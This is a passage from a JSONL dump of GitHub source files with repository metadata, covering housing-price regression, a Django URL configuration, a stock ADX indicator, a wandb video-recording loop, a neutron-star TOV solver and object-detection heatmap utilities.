30000000])\n\tax.get_yaxis().set_major_formatter(ticker.ScalarFormatter())\n\n\n\tplt.xlabel('Property Index (i)')\n\tplt.ylabel('Property Price (dollars)')\n\tplt.title('Random Forest Regressor: Ground Truth vs Predicted Property Price')\n\n\tplt.legend(loc=\"upper right\")\n\n\t#For saving a subplot\n\tfig.savefig('./random_forest_graph.png')\n\tplt.show()\n\ndef main():\n\thouses = Utils.get_house_data('../RemaxScrape/remaxDataset2.json', region=\"Victoria\")\n\thouses += Utils.get_house_data(\"../RemaxScrape/remaxVanDataset.json\", region=\"Vancouver\")\n\tprint(\"Total listings: \" + str(len(houses)) + \"\\n\")\n\tX, y = Utils.create_matrices(houses, 10)\n\n\t# Scale feature data a bit (doesn't seem to help much)\n\tX = preprocessing.scale(X) \n\n\tn_splits = 5\n\t\n\t'''\n\tprint(\"Support Vector Regression with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, svm.SVR()) \n\n\tprint(\"Bayesian Ridge Regression with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, BayesianRidge())\n\t#\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, liblinear solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"liblinear\"))\n\t\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, newton-cg solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"newton-cg\"))\n\t\n\tprint(\"Logistic Regression with \" + str(n_splits) + \"-fold cross-validation, lbfgs solver\")\n\tclassify(X, y, n_splits, LogisticRegression(solver=\"lbfgs\"))\n\t\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, squared loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"squared_loss\"))\n\t\n\tprint(\"Stochastic Gradient 
Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, huber loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"huber\"))\n\t\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, epsilon insensitive loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"epsilon_insensitive\"))\n\n\tprint(\"Stochastic Gradient Descent Regressor with \" + str(n_splits) + \"-fold cross-validation, squared epsilon insensitive loss\")\n\tclassify(X, y, n_splits, SGDRegressor(loss=\"squared_epsilon_insensitive\"))\n\t\n\tprint(\"Perceptron with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, Perceptron())\n\t\n\t#print(\"Passive-Aggressive Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\t#classify(X, y, n_splits, PassiveAggressiveRegressor())\n\t\n\tprint(\"RANSAC Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, RANSACRegressor())\n\t\n\t#print(\"Theil-Sen Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\t#classify(X, y, n_splits, TheilSenRegressor())\n\t'''\n\tprint(\"Random Forest Regressor with \" + str(n_splits) + \"-fold cross-validation\")\n\tclassify(X, y, n_splits, RandomForestRegressor())\n\t\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "jeremykr/seng474uvic", "sub_path": "Classification/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.model_selection.KFold", "line_number": 16, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 56, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": 
"name"}, {"api_name": "utils.Utils.get_house_data", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 84, "usage_type": "name"}, {"api_name": "utils.Utils.get_house_data", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 85, "usage_type": "name"}, {"api_name": "utils.Utils.create_matrices", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.Utils", "line_number": 87, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 90, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "37236536112", "text": "from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nfrom django.views.generic.simple import direct_to_template\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom account.openid_consumer import PinaxConsumer\n\n\nif settings.ACCOUNT_OPEN_SIGNUP:\n signup_view = \"account.views.signup\"\nelse:\n signup_view = \"signup_codes.views.signup\"\n\n\nurlpatterns = patterns('',\n url(r'^$', direct_to_template, {\n \"template\": \"homepage.html\",\n }, name=\"home\"),\n \n url(r'^admin/invite_user/$', 'signup_codes.views.admin_invite_user', name=\"admin_invite_user\"),\n url(r'^account/signup/$', signup_view, name=\"acct_signup\"),\n \n (r'^about/', include('about.urls')),\n (r'^account/', include('account.urls')),\n (r'^openid/(.*)', PinaxConsumer()),\n (r'^profiles/', include('rateme_profiles.urls')),\n (r'^notices/', include('notification.urls')),\n (r'^announcements/', include('announcements.urls')),\n# (r'^comments/', include('threadedcomments.urls')),\n \n (r'^admin/(.*)', admin.site.root),\n (r'^pictures/', include('pictures.urls')),\n (r'^avatar/', include('avatar.urls')),\n (r'^judges/', include('judges.urls')),\n)\n\nif settings.SERVE_MEDIA:\n urlpatterns += patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n", "repo_name": "flynhigher/terry-play-ground", "sub_path": "RateMe/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 7, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.settings.ACCOUNT_OPEN_SIGNUP", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.simple.direct_to_template", "line_number": 19, "usage_type": "argument"}, {"api_name": "account.openid_consumer.PinaxConsumer", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.settings.SERVE_MEDIA", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "7360070028", "text": "import sys, 
os\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/..\")\nfrom jsonHandler import *\nfrom getData import getStocksHighLow, getForexHighLow\nimport talib, numpy, requests, json\n\ndef adxProcess (): \n\t#Load config\n\tconfig = load_json(\"config.json\")\n\tadxParams = config[\"ADX\"]\n\tsecurity = config[\"Security\"][\"CurrentSecurity\"]\n\tdaysBack = config[\"Security\"][security][\"dataParams\"][\"daysBack\"]\n\n\t#Get high, low, and close prices from getData.py\n\t#Stocks\n\tif (security == \"Stocks\"):\n\t\thighAsk, lowAsk, closeAsk = getStocksHighLow ()\n\t#Forex\n\telse:\n\t\thighAsk, lowAsk, closeAsk = getForexHighLow ()\n\n\t#Format for talib\n\thighAsk = numpy.array([float(x) for x in highAsk])\n\tlowAsk = numpy.array([float(x) for x in lowAsk])\n\tcloseAsk = numpy.array([float(x) for x in closeAsk])\n\t\n\t#Get ADX from talib\n\tADX = talib.ADX(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\tplusDirection = talib.PLUS_DI(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\tminusDirection = talib.MINUS_DI(highAsk, lowAsk, closeAsk, adxParams[\"A\"])\n\n\t#Create array of dictionaries to add to processed data\n\tadx = []\n\tfor i in range (len(highAsk) - daysBack, len(highAsk)):\n\t\tadxPart = {\n\t\t\t\t'ADX': ADX[i],\n\t\t\t\t'+DI': plusDirection[i],\n\t\t\t\t'-DI': minusDirection[i]\n\t\t}\n\t\tadx.append(adxPart)\n\n\treturn adx\n", "repo_name": "sampocs/UW-ATC", "sub_path": "deps/processing/ADX.py", "file_name": "ADX.py", "file_ext": "py", "file_size_in_byte": 1278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "getData.getStocksHighLow", "line_number": 17, "usage_type": "call"}, {"api_name": "getData.getForexHighLow", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "talib.ADX", "line_number": 28, "usage_type": "call"}, {"api_name": "talib.PLUS_DI", "line_number": 29, "usage_type": "call"}, {"api_name": "talib.MINUS_DI", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "31174048142", "text": "import os\nimport sys\nimport subprocess\n\nfrom typarse import BaseParser\nimport wandb\n\n\nclass Parser(BaseParser):\n project_name: str\n env_path: str\n source: str = \"titan\"\n skip: int = 0\n force: bool = False\n only_finished: bool = False\n\n _help = {\n \"project_name\": \"Name of the wandb project\",\n \"env_path\": \"Path to the Unity environment binary\",\n \"source\": \"Source of the run\",\n \"skip\": \"Number of runs to skip\",\n \"force\": \"Whether to force the recording even if the video already exists\",\n \"only_finished\": \"Whether to only record videos for finished runs\",\n }\n\n _abbrev = {\n \"project_name\": \"p\",\n \"env_path\": \"e\",\n \"source\": \"c\",\n \"skip\": \"s\",\n \"force\": \"f\",\n \"only_finished\": \"o\",\n }\n\n\ndef has_video(run: wandb.apis.public.Run):\n return any(key.startswith('video') for key in run.summary.keys())\n\n\n# Sketch of the code to be generated\n# 
Iterate over all runs in the project\n# For each run, check if any key in `run.summary` starts with `video`\n# If it does, ignore the run unless `force` is set to True\n# If it doesn't, pull the config and the model, and use it to record a new video\n\n\nif __name__ == \"__main__\":\n args = Parser()\n\n api = wandb.Api()\n runs = list(api.runs(args.project_name))\n runs = runs[args.skip:]\n\n num_runs = len(runs)\n\n for i, run in enumerate(runs):\n print(f\"Processing run {i + 1}/{num_runs}\")\n if not args.force and has_video(run):\n print(f\"Skipping {run.name}\")\n continue\n\n run_path = '/'.join(run.path)\n\n if args.only_finished and run.state != 'finished':\n print(f\"Skipping {run.name} because it is not finished\")\n continue\n\n # Run `do_record_from_wandb.py` as a separate process\n\n process = subprocess.Popen(\n [sys.executable, \"do_record_from_wandb.py\", \"--run_path\", run_path, \"--env_path\", args.env_path, \"--source\", args.source],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n for line in iter(process.stdout.readline, b''):\n print(line.decode().strip())\n\n process.stdout.close()\n process.wait()\n\n stderr = process.stderr.read().decode()\n if stderr:\n print(\"Error: \", stderr)\n process.stderr.close()\n", "repo_name": "RedTachyon/coltra-rl", "sub_path": "scripts/record_from_wandb.py", "file_name": "record_from_wandb.py", "file_ext": "py", "file_size_in_byte": 2362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typarse.BaseParser", "line_number": 9, "usage_type": "name"}, {"api_name": "wandb.apis", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wandb.Api", "line_number": 50, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 71, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "30967429146", "text": "import numpy as np\nfrom scipy.integrate import quad\nfrom scipy.integrate import odeint\nfrom functions import minP,findXPoint\nimport matplotlib.pyplot as plt\n\ndef tauf1(r,y0):\n if y0 <= 10:\n if r < 1e-10:\n return 0.1\n elif r <= 1e-1:\n return 0.01\n elif r > 1e-1:\n return 0.001\n elif y0 > 10:\n if r < 1e-10:\n return 0.5\n elif r <= 1e-1:\n return 0.1\n elif r > 1e-1:\n return 0.001\n\npi = np.pi\ndef EosRho(k):\n m_f =1\n return (1/(pi**2))*(k**2)*(np.sqrt(m_f**2 + k**2))\n \ndef EosP(k):\n m_f =1\n return (1/(3*pi**2))*((k**4)/(np.sqrt(m_f**2 + k**2)))\n\ndef intTerm(y,z):\n return (((1/(3*pi**2)))**2)*(y**2)*(z**6)\n\ndef TOVintEoS(rho_0,y):\n\n kmin = 0\n kmax = np.array([])\n k1 = np.linspace(1e-16,1e-15,500,endpoint=True)\n\n for i in range(0,21):\n k = k1*(10**i)\n kmax = np.append(kmax,k)\n\n EoSrho1 = np.array([])\n EoSP1 = np.array([])\n\n for i in range(len(kmax)):\n a =quad(EosP,kmin,kmax[i]) \n b =quad(EosRho,kmin,kmax[i]) \n EoSP1 = np.append(EoSP1,a[0]+intTerm(y,kmax[i]))\n EoSrho1 = np.append(EoSrho1,b[0]+intTerm(y,kmax[i]))\n\n EoSP = np.unique(EoSP1)\n EoSrho = np.unique(EoSrho1)\n\n def Pforrho(rho):\n i = min(EoSrho,key=lambda x:abs(x-rho)) #find closest value to P0\n a = np.where(EoSrho==i) # index of closest point to P0\n index =a[0][0] #index of closest P0 (a outputs 2 dim. 
array)\n\n p1 = EoSP[index]\n rho1 = EoSrho[index]\n\n if rho > EoSrho[index]:\n p2 = EoSP[index+1]\n rho2 = EoSrho[index+1]\n f = findXPoint(p1,p2,rho1,rho2,rho)\n # f2 = interp1d([p1,p2],[rho1,rho2])\n\n elif rho < EoSrho[index]:\n p2 = EoSP[index-1]\n rho2 = EoSrho[index-1]\n f = findXPoint(p2,p1,rho2,rho1,rho)\n\n elif rho == EoSrho[index]:\n f = EoSP[index]\n\n return f\n\n def rhof(P_v): # Pressure on x-axis and Rho on y-axis\n i = min(EoSP,key=lambda x:abs(x-P_v)) #find closest value to P0\n a = np.where(EoSP==i) # index of closest point to P0\n index =a[0][0] #index of closest P0 (a outputs 2 dim. array)\n p1 = EoSP[index]\n rho1 = EoSrho[index]\n\n if P_v > EoSP[index]:\n p2 = EoSP[index+1]\n rho2 = EoSrho[index+1]\n f1 = findXPoint(rho1,rho2,p1,p2,P_v)\n # f2 = interp1d([p1,p2],[rho1,rho2])\n\n elif P_v < EoSP[index]:\n p2 = EoSP[index-1]\n rho2 = EoSrho[index-1]\n f1 = findXPoint(rho2,rho1,p2,p1,P_v)\n # f2 = interp1d([p2,p1],[rho2,rho1])\n elif P_v == EoSP[index]:\n f1 = EoSrho[index]\n\n return f1\n\n P0 = Pforrho(rho_0)\n\n def diff(x,r):\n P = x[0]\n m = x[1]\n # TOV\n k = (rho)/(r)\n k1 = 1 + (P/rho)\n k2 = m + ((4*np.pi*(r**3)*P))\n k3 = (r - (2*m))**(-1)\n dPdr = -(k)*(k1*k2*k3) \n # Mass\n dmdr = 4*np.pi*(r**2)*rho\n return [dPdr,dmdr]\n\n eps = np.finfo(float).eps\n \n rho = rho_0\n x0 = [P0,0]\n int_P = P0\n limit = minP(int_P)\n\n # tau = tauR(rho)\n tau = tauf1(P0,y)\n r_new = 1e-10\n t_span =np.linspace(r_new,tau+r_new,10)\n \n P_array = np.array([])\n r_array = np.array([])\n m_array = np.array([])\n\n while True:\n # print(rho)\n \n sol = odeint(diff,x0,t_span)\n P = sol[:,0] \n m = sol[:,1]\n\n # print(P[-1],rho)\n\n if (P <= limit).any():\n index = np.where(P<= limit)\n i = index[0][0]\n if i ==0:\n R = r_array[-1][-1]\n M = m_array[-1][-1]\n else:\n R = t_span[i-1]\n M = m[i-1]\n compactness = R/M\n print('Star found with R= ',R,'& M=',M, 'Compactness(R/M) = ',(R)/(M),'(1 Step Profile) with',len(r_array),'steps')\n break\n\n P_array = np.append(P_array,P)\n r_array = np.append(r_array,t_span)\n m_array = np.append(m_array,m)\n rho = rhof(P[-1])\n # tau = tauR(rho)\n tau = tauf1(P[-1],y)\n t_span = np.linspace(t_span[-1],tau+t_span[-1],10)\n x0 = [P[-1],m[-1]]\n\n R1 = R\n M1 = M\n comp = compactness\n \n return R1,M1,r_array,P_array,m_array,comp\n\n# TOV test\n# sol = TOVintEoS(10**3,1000)\n# plt.plot(sol[2],sol[3])\n# plt.show()\n\n\n\n# y = [0.01,1,10,10**2,10**3]\ny = np.array([])\ny1 = np.linspace(0.01,1,5,endpoint=True)\nfor i in range(0,3):\n h = y1*(10**i)\n y = np.append(y,h)\n# print(y)\nrho1 = np.linspace(10**(-8),10**(-7),10,endpoint=True)\n\nrho = np.array([])\nfor i in range(0,9):\n k = rho1*(10**i)\n rho = np.append(rho,k)\n\nR = np.array([])\nM = np.array([])\nfor j in range(len(y)):\n for i in range(len(rho)):\n print('Star #',i,'rho=',rho[i],'y=',y[j])\n sol = TOVintEoS(rho[i],y[j])\n # plt.plot(sol[2],sol[4],color='red')\n M = np.append(M,sol[1])\n R = np.append(R,sol[0])\n\n # plt.loglog(R,M,'.',color='black')\n plt.loglog(R, M, color='black', marker='o', markersize=0.01)\n# plt.plot(R,M,color='red')\n\nplt.xlim([1,1e4])\nplt.ylim([1e-3,200])\nplt.xlabel('dimensionaless $R$')\nplt.ylabel('dimensionaless $M(R)$')\nplt.show()", "repo_name": "EulerMacaroni/stars", "sub_path": "RvsM_intEoS.py", "file_name": "RvsM_intEoS.py", "file_ext": "py", "file_size_in_byte": 5324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.pi", "line_number": 23, "usage_type": 
"attribute"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "scipy.integrate.quad", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.integrate.quad", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 68, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 83, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 91, "usage_type": "call"}, {"api_name": "functions.findXPoint", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.finfo", "line_number": 119, "usage_type": "call"}, {"api_name": "functions.minP", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.loglog", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 208, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 211, "usage_type": "name"}]} +{"seq_id": "14458011628", "text": "import torch\nimport torch.nn as nn\nimport os\nimport random\nimport cv2\nimport numpy as np \n\ndef draw_proposals(position_matrix, img, extract=5):\n if os.path.exists(\"/home/jhsu/yjl/lite/draw_proposals/\"):\n pass\n else:\n os.mkdir(\"/home/jhsu/yjl/lite/draw_proposals/\")\n # red, blue, green, yellow, black\n # (14, 3, 511, 511)\n mean = np.array([0.40789654, 0.44719302, 0.47026115],\n dtype=np.float32).reshape(3, 1, 1)\n std = np.array([0.28863828, 0.27408164, 0.27809835],\n dtype=np.float32).reshape(3, 1, 1)\n img = (img[0].detach().cpu().numpy() * std + mean) * 255\n # 再把图片transpose成标准的样子\n img = img.astype(np.uint8).transpose(1, 2, 0)\n img = img.copy()\n # img = np.array(img.transpose(2, 0).cpu())\n a = [(0, 0, 255), (255, 0, 0), (0, 100, 0), (0, 255, 255), (0, 0, 0)]\n # print(80*\"K\")\n # print(type(img))\n # print(img.shape)\n for idx, position in enumerate(position_matrix):\n y = position[0].item()\n x = position[1].item()\n # print(x, y)\n # if x <= extract // 2:\n # x = extract // 2\n # elif x + extract // 2 >= img.shape[1] - 1:\n # x = img.shape[1] - extract // 2 - 1\n # if y <= extract // 2:\n # y = extract // 2\n # elif y + extract // 2 >= img.shape[1] - 1:\n # y = img.shape[1] - extract // 2 - 1\n # print(x, y)\n # color = BGR\n img = cv2.circle(img, center=(x*8, y*8), radius=extract, color=a[idx // 50], thickness=-1)\n # img = cv2.rectangle(img, (x*8 - extract*8, y*8 - extract*8), (x*8 + extract*8, y*8 + extract*8), color=a[idx // 50])\n count = random.randint(0, 10000)\n cv2.imwrite(\"/home/jhsu/yjl/lite/draw_proposals/iamge_\" + str(count) + \".jpg\", img)\n print(\"save img ok!!!\")\n\ndef save_tensor(a, BATCH, C, H, W):\n print(a.size())\n a = a.numpy()\n with open(\"/home/jhsu/yjl/lite/core/models/py_utils/save_tensor.txt\", 'w') as f:\n f.write(\"[\")\n for batch, n in enumerate(a):\n f.write(\"[\")\n for x, i in enumerate(n):\n f.write(\"[\")\n for y, j in enumerate(i):\n f.write(\"[\")\n for z, k in enumerate(j):\n if z == W:\n f.write(str(k))\n else:\n f.write(str(k) + \", \")\n if y == H and x != C and batch != BATCH:\n f.write(\"]],\" + \"\\n\")\n elif y == H and x == C and batch != BATCH:\n f.write(\"]]],\" + \"\\n\")\n elif batch == BATCH and y == H and x == C:\n f.write(\"]]]]\" + \"\\n\")\n else:\n f.write(\"],\" + \"\\n\")\n f.write(\"\\n\")\n print(\" save done!\")\n\ndef extract_fa(fm, x, y, extract):\n x = int(x)\n y = int(y)\n # x轴坐标变换\n if x <= extract // 2:\n x = extract // 2\n elif x + extract // 2 >= fm.size(1) - 1:\n x = fm.size(1) - extract // 2 - 1\n \n # y轴坐标变换\n if y <= extract // 2:\n y = extract // 2\n elif y + extract // 2 >= fm.size(2) - 1:\n y = fm.size(2) - extract // 2 - 1\n # 截取\n if extract == 3:\n for_fa = fm[:, x - 1:x + extract - 1, y - 1:y + extract - 1]\n elif extract == 5:\n for_fa = fm[:, x - 2:x + extract - 2, y - 2:y + extract - 2]\n else:\n for_fa = fm[:, x - 3:x + extract - 3, y - 3:y + extract - 3]\n # print(for_fa.size())\n return 
for_fa\n\n\ndef extract_fg(x, y, w, h):\n '''\n pass in a single kp\n and return a 3*3*7 tensor\n '''\n for_fg = torch.zeros([4], dtype=torch.int32)\n for_fg[0] = x\n for_fg[1] = y\n for_fg[2] = w\n for_fg[3] = h\n return for_fg\n\n\ndef update_heatmap(fa_new, fm, fg, extract):\n '''\n fa_new is [num_kps, 256, 7, 7]\n fm is [256, 128, 128]\n fg is [num_kps, 4]\n extract is the crop region size\n '''\n # empty_fm needs no gradient right now, but it will once the computation is done\n empty_fm = torch.zeros([fm.size(0), fm.size(1), fm.size(2)]).cuda()\n\n for fa_extract, fa_position in zip(fa_new, fg):\n x = fa_position[0]\n y = fa_position[1]\n\n # x-axis coordinate transform\n if x <= extract // 2:\n x = extract // 2\n elif x + extract // 2 >= fm.size(1) - 1:\n x = fm.size(1) - extract // 2 - 1\n \n # y-axis coordinate transform\n if y <= extract // 2:\n y = extract // 2\n elif y + extract // 2 >= fm.size(2) - 1:\n y = fm.size(2) - extract // 2 - 1\n\n if extract == 3:\n empty_fm[:, x - 1:x + extract - 1, y - 1:y + extract - 1] = fa_extract\n elif extract == 5:\n empty_fm[:, x - 2:x + extract - 2, y - 2:y + extract - 2] = fa_extract\n else:\n empty_fm[:, x - 3:x + extract - 3, y - 3:y + extract - 3] = fa_extract\n\n empty_fm = empty_fm.detach()\n return empty_fm\n \n \ndef _gather_feat(feat, ind, mask=None):\n dim = feat.size(2)\n ind = ind.unsqueeze(2).expand(ind.size(0), ind.size(1), dim)\n feat = feat.gather(1, ind)\n if mask is not None:\n mask = mask.unsqueeze(2).expand_as(feat)\n feat = feat[mask]\n feat = feat.view(-1, dim)\n return feat\n\ndef _nms(heat, kernel=1):\n pad = (kernel - 1) // 2\n\n hmax = nn.functional.max_pool2d(heat, (kernel, kernel), stride=1, padding=pad)\n keep = (hmax == heat).float()\n return heat * keep\n\ndef _tranpose_and_gather_feat(feat, ind):\n feat = feat.permute(0, 2, 3, 1).contiguous()\n feat = feat.view(feat.size(0), -1, feat.size(3))\n feat = _gather_feat(feat, ind)\n return feat\n\ndef _topk(scores, K=20):\n batch, cat, height, width = scores.size()\n\n topk_scores, topk_inds = torch.topk(scores.view(batch, -1), K)\n\n topk_clses = (topk_inds / (height * width)).int()\n\n topk_inds = topk_inds % (height * width)\n topk_ys = (topk_inds / width).int().float()\n topk_xs = (topk_inds % width).int().float()\n return topk_scores, topk_inds, topk_clses, topk_ys, topk_xs\n\n# first apply sigmoid to turn the maps into response values, then nms (maxpooling), then take the top-k\ndef _decode(\n tl_heat, br_heat, tl_tag, br_tag, tl_regr, br_regr, \n K=200, kernel=1, ae_threshold=1, num_dets=1000, no_border=False\n):\n batch, cat, height, width = tl_heat.size()\n\n tl_heat = 